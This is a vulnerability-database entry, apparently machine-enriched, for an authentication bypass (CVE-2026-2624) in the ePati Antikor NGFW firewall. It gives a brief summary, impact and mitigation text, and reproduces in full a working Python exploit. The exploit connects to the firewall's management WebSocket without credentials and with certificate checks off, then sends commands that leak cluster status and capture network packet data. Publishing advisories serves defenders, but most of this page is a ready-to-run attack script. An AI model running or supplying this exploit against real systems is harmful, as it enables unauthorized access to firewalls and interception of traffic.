ePati Antikor NGFW 2.0.1301 - Authentication Bypass
An authentication bypass vulnerability exists in ePati Antikor NGFW version 2. 0. 1301. This flaw allows an attacker to bypass authentication controls, potentially gaining unauthorized access. Exploit code is publicly available in Python. No patch or official remediation information is currently provided.
AI Analysis
Technical Summary
The ePati Antikor NGFW 2.0.1301 product contains an authentication bypass vulnerability. This weakness enables attackers to circumvent authentication mechanisms, potentially accessing protected resources without valid credentials. The exploit is documented in Exploit-DB (ID 52562) and includes Python code to demonstrate the bypass. No affected versions beyond 2.0.1301 are specified, and no vendor advisory or patch information is available at this time.
Potential Impact
Successful exploitation of this vulnerability could allow unauthorized users to gain access to the firewall management interface or other protected functions, undermining security controls. This could lead to unauthorized configuration changes or exposure of sensitive information. However, there is no evidence of active exploitation in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the affected system's management interfaces and monitor for suspicious activity related to authentication attempts.
Indicators of Compromise
- exploit-code: # Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass # Date: 2026-04-13 # Exploit Author: [SADIK ERTÜRK] # Vendor Homepage: https://www.epati.com.tr/ # Software Link: https://www.epati.com.tr/antikor-ngfw/ # Version: v.2.0.1298 - v.2.0.1301 # Tested on: Linux / Antikor OS # CVE: CVE-2026-2624 import websocket import json import ssl import sys import argparse import random import string import time def banner(): print("-" * 65) print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit") print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]") print("-" * 65) def generate_random_id(length=8): """Generates a random session ID for the SockJS connection.""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def exploit(target_ip, target_port): # Generating random server and session IDs for SockJS server_id = random.randint(100, 999) session_id = generate_random_id() ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket" print(f"[*] Target WebSocket URL created: {ws_url}") print("[*] Connecting to the target... (Ignoring SSL certificate warnings)") try: # Bypassing Self-Signed SSL certificate verifications ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE}) ws.connect(ws_url) print("[+] Connection Successful! (Authentication bypassed)\n") # Payload 1: Listening to Cluster and System Status payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"]) print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...") ws.send(payload_1) # Wait for the response from the server time.sleep(1) response_1 = ws.recv() if response_1: print("[+] SUCCESSFUL! Sensitive system data successfully leaked:") print(f"> {response_1}\n") # Payload 2: Listening to Network Packets payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"]) print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...") ws.send(payload_2) time.sleep(1) response_2 = ws.recv() if response_2: print("[+] Network packet data captured:") print(f"> {response_2}\n") print("[*] Exploitation complete. Closing connection.") ws.close() except websocket.WebSocketException as e: print(f"[-] WebSocket Error: {e}") print("[-] The target might be patched (v.2.0.1302+) or the port is closed.") sys.exit(1) except Exception as e: print(f"[-] An unexpected error occurred: {e}") sys.exit(1) if __name__ == "__main__": banner() # Argument parsing parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC") parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)") parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)") args = parser.parse_args() exploit(args.target, args.port)
ePati Antikor NGFW 2.0.1301 - Authentication Bypass
Description
An authentication bypass vulnerability exists in ePati Antikor NGFW version 2. 0. 1301. This flaw allows an attacker to bypass authentication controls, potentially gaining unauthorized access. Exploit code is publicly available in Python. No patch or official remediation information is currently provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The ePati Antikor NGFW 2.0.1301 product contains an authentication bypass vulnerability. This weakness enables attackers to circumvent authentication mechanisms, potentially accessing protected resources without valid credentials. The exploit is documented in Exploit-DB (ID 52562) and includes Python code to demonstrate the bypass. No affected versions beyond 2.0.1301 are specified, and no vendor advisory or patch information is available at this time.
Potential Impact
Successful exploitation of this vulnerability could allow unauthorized users to gain access to the firewall management interface or other protected functions, undermining security controls. This could lead to unauthorized configuration changes or exposure of sensitive information. However, there is no evidence of active exploitation in the wild.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the affected system's management interfaces and monitor for suspicious activity related to authentication attempts.
Technical Details
- Edb Id
- 52562
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for ePati Antikor NGFW 2.0.1301 - Authentication Bypass
# Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass # Date: 2026-04-13 # Exploit Author: [SADIK ERTÜRK] # Vendor Homepage: https://www.epati.com.tr/ # Software Link: https://www.epati.com.tr/antikor-ngfw/ # Version: v.2.0.1298 - v.2.0.1301 # Tested on: Linux / Antikor OS # CVE: CVE-2026-2624 import websocket import json import ssl import sys import argparse import random import string import time def banner(): print("-" * 65) print(" ePati Antikor NGFW Unauthenticate... (2784 more characters)
Threat ID: 6a084e9bec166c07b0dd937c
Added to database: 5/16/2026, 11:01:47 AM
Last enriched: 5/16/2026, 11:02:19 AM
Last updated: 5/17/2026, 5:30:32 AM
Views: 13
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.